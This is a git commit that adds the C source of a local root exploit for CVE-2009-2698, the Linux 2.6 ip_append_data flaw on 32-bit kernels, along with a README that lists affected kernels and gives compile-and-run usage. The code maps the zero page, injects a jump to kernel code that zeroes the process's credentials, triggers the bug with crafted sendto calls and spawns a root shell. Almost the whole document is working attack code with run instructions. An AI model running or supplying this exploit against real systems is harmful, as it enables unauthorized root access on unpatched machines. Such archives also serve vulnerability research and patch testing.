CVE-2009-2698

Gitmaninc · Gitmaninc · commit ff87157cc64f · 2017-05-14T11:20:56.000-04:00
diff --git a/CVE-2009-2698/36108.c b/CVE-2009-2698/36108.c
@@ -0,0 +1,107 @@
+/*
+**
+** 0x82-CVE-2009-2698
+** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
+**
+** Tested White Box 4(2.6.9-5.ELsmp),
+** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
+** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
+** Fedora Core 6(2.6.18-1.2798.fc6).
+**
+** --
+** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
+** Thankful to them.
+**
+** --
+** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
+** sh-3.1# id
+** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
+** sh-3.1#
+** --
+** exploit by <p0c73n1(at)gmail(dot)com>.
+**
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <sys/personality.h>
+
+unsigned int uid, gid;
+void get_root_uid(unsigned *task)
+{
+	unsigned *addr=task;
+	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
+		addr++;
+	}
+	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
+	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
+	return;
+}
+void exploit();
+void kernel_code()
+{
+	asm("exploit:\n"
+		"push %eax\n"
+		"movl $0xfffff000,%eax\n"
+		"andl %esp,%eax\n"
+		"pushl (%eax)\n"
+		"call get_root_uid\n"
+		"addl $4,%esp\n"
+		"popl %eax\n");
+	return;
+}
+void *kernel=kernel_code;
+
+int main(int argc, char **argv)
+{
+	int fd=0;
+	char buf[1024];
+	struct sockaddr x0x;
+	void *zero_page;
+
+	uid=getuid();
+	gid=getgid();
+	if(uid==0){
+		fprintf(stderr,"[-] check ur uid\n");
+		return -1;
+	}
+	if(personality(0xffffffff)==PER_SVR4){
+		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
+			perror("[-] mprotect()");
+			return -1;
+		}
+	}
+	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
+			perror("[-] mmap()");
+			return -1;
+	}
+	*(unsigned long *)0x0=0x90909090;
+	*(char *)0x00000004=0x90; /* +1 */
+	*(char *)0x00000005=0xff;
+	*(char *)0x00000006=0x25;
+	*(unsigned long *)0x00000007=(unsigned long)&kernel;
+	*(char *)0x0000000b=0xc3;
+
+	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
+		perror("[-] socket()");
+		return -1;
+	}
+	x0x.sa_family=AF_UNSPEC;
+	memset(x0x.sa_data,0x82,14);
+	memset((char *)buf,0,sizeof(buf));
+	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
+	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
+	if(getuid()==uid){
+		printf("[-] exploit failed, try again\n");
+		return -1;
+	}
+	close(fd);
+	execl("/bin/sh","sh","-i",NULL);
+	return 0;
+}
+
+/* eoc */
diff --git a/CVE-2009-2698/README.md b/CVE-2009-2698/README.md
@@ -0,0 +1,23 @@
+# CVE-2009-2698
+
+CVE-2009-2698
+
+Vulnerability reference:
+ * [CVE-2009-2698](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2009-2698)  
+
+## Kernels
+```
+2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 2.6.7, 2.6.8, 2.6.9, 2.6.10, 2.6.11, 2.6.12, 2.6.13, 2.6.14, 2.6.15, 2.6.16, 2.6.17, 2.6.18, 2.6.19
+```   
+
+## Usage
+```
+gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
+```  
+
+
+## References
+* [http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c](http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c)
+
+
+
